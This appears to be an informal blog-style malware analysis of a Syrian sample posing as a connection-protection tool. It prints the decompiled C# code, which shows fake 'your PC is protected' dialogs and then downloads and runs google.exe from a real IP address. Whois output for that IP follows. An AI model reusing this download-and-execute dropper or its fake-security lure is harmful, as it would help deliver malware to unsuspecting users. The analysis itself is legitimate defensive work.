Howdy all!
Today we’re going to go through some malware straight out of the armpit of the world – Syria. There are of course hurdles to this – namely language barriers. A lot code I run into has Arabic characters, but the code is functionally the same. As you may (or not) know, there is a military conflict going on right now in Syria and they’re using cyber warfare. State sponsored malware has been seen and captured for analysis. We know its from Syria because the C&C servers go right back to Assad and government facilities in Syria.
I get my samples from a friend of mine Zach whom runs the site syrianmalware.com.
Today we’re going to look at a couple of examples. The first was fairly easy to pull apart. In fact, most of the crap out of Syria has been really easy to pull apart.
You know you’re dealing with pros when the malware looks like this:
Awesome. There was no obfuscation done on this one either. As far as obfuscation goes, I’ve had pretty good luck so far as they only seem to be utilizing reflection:
Now then, let’s have a look see at this malware.
// EncryptYourConection.Form1 [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] private void Button1_Click(object sender, EventArgs e) { int num2; int num3; try { IL_00: int num = 1; Interaction.MsgBox("Please Wait while Check Your PC", MsgBoxStyle.OkOnly, null); IL_0F: ProjectData.ClearProjectError(); num2 = 1; IL_16: num = 3; Interaction.Shell("cmd.exe /ctree c:\\windows", AppWinStyle.NormalFocus, false, -1); IL_26: num = 4; Interaction.Shell("cmd.exe /ctree d:", AppWinStyle.MaximizedFocus, false, -1); IL_36: num = 5; Interaction.Shell("cmd.exe /ctree E:", AppWinStyle.NormalFocus, false, -1); IL_46: num = 6; Interaction.Shell("cmd.exe /ctree f:", AppWinStyle.NormalFocus, false, -1); IL_56: num = 7; Interaction.Shell("cmd.exe /ctree g:", AppWinStyle.NormalFocus, false, -1); IL_66: num = 8; Interaction.Shell("cmd.exe /ctree h:", AppWinStyle.NormalFocus, false, -1); IL_76: num = 9; Interaction.Shell("cmd.exe /ctree i:", AppWinStyle.NormalFocus, false, -1); IL_87: num = 10; Interaction.Shell("cmd.exe /ctree j:", AppWinStyle.NormalFocus, false, -1); IL_98: num = 11; Interaction.Shell("cmd.exe /ctree k:", AppWinStyle.NormalFocus, false, -1); IL_A9: num = 12; Interaction.Shell("cmd.exe /ctree l:", AppWinStyle.NormalFocus, false, -1); IL_BA: ProjectData.ClearProjectError(); num2 = 1; IL_C1: num = 14; if (FileSystem.FileLen(Interaction.Environ("temp") + "\\google.exe") == 0L) { goto IL_FD; } IL_E1: num = 15; FileSystem.Kill(Interaction.Environ("temp") + "\\google.exe"); IL_FD: num = 17; MyProject.Computer.Network.DownloadFile("http://216.6.0.28/google.exe", Interaction.Environ("temp") + "\\google.exe"); IL_128: num = 18; Interaction.Shell(Interaction.Environ("temp") + "\\google.exe", AppWinStyle.MinimizedFocus, false, -1); IL_148: num = 19; this.ProgressBar1.Value = 50; IL_158: num = 20; Thread.Sleep(10000); IL_165: num = 21; this.Timer1.Enabled = true; IL_174: num = 22; Interaction.MsgBox("You PC is Protect now thank for using our Product", MsgBoxStyle.OkOnly, null); IL_184: num = 23; this.Button1.Enabled = false; IL_193: num = 24; this.Button2.Enabled = true; IL_1A2: goto IL_258; IL_1A7: int arg_1AC_0 = num3 + 1; num3 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], arg_1AC_0); IL_219: goto IL_24D; num3 = num; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num2); IL_22B: goto IL_24D; } object arg_22D_0; endfilter(arg_22D_0 is Exception & num2 > 0 & num3 == 0); IL_24D: throw ProjectData.CreateProjectError(-2146828237); IL_258: if (num3 != 0) { ProjectData.ClearProjectError(); } }
I rather liked this bit:
// EncryptYourConection.Form1 private void Button2_Click(object sender, EventArgs e) { this.ProgressBar1.Value = 0; Interaction.MsgBox("You Are Running On unprotected Conection You Maybe At Risk !!!!", MsgBoxStyle.OkOnly, null); this.Button1.Enabled = true; this.Button2.Enabled = false; }
Breakdown – Run the program and a shitty looking form appears. A command prompt window appears when you attempt to “secure” your system that just runs the ‘tree’ command. After that, the program attempts to download and run the file “http://216.6.0.28/google.exe”. The site just spins its wheels when I attempt to pull down the file, but inspecting the IP, we get the following info:
# http://whois.arin.net/rest/nets;handle=NET-216-6-0-0-2?showDetails=true&showARIN=false&ext=netref2 # NetRange: 216.6.0.0 - 216.6.1.255 CIDR: 216.6.0.0/23 OriginAS: NetName: SYRIAN-5 NetHandle: NET-216-6-0-0-2 Parent: NET-216-6-0-0-1 NetType: Reassigned Comment: Fax-no-963 11 3739765 RegDate: 2005-07-22 Updated: 2005-07-22 Ref: http://whois.arin.net/rest/net/NET-216-6-0-0-2 OrgName: STE (Syrian Telecommunications Establishment) OrgId: SSTE Address: Fayz Mansour St Address: STE Building City: Damascus StateProv: PostalCode: Country: SY RegDate: 2005-07-22 Updated: 2011-09-24 Ref: http://whois.arin.net/rest/org/SSTE OrgTechHandle: SAL55-ARIN OrgTechName: AL NASHEF, Samer OrgTechPhone: +963 11 3739766 OrgTechEmail: sytld-admin@net.sy OrgTechRef: http://whois.arin.net/rest/poc/SAL55-ARIN OrgAbuseHandle: SAL55-ARIN OrgAbuseName: AL NASHEF, Samer OrgAbusePhone: +963 11 3739766 OrgAbuseEmail: sytld-admin@net.sy OrgAbuseRef: http://whois.arin.net/rest/poc/SAL55-ARIN RTechHandle: SAL55-ARIN RTechName: AL NASHEF, Samer RTechPhone: +963 11 3739766 RTechEmail: sytld-admin@net.sy RTechRef: http://whois.arin.net/rest/poc/SAL55-ARIN
GEE, I WONDER WHO COULD BE BEHIND THIS?
Stay tuned for part 2 when I go over the other 2 pieces. For now though, its late and I need my beauty rest.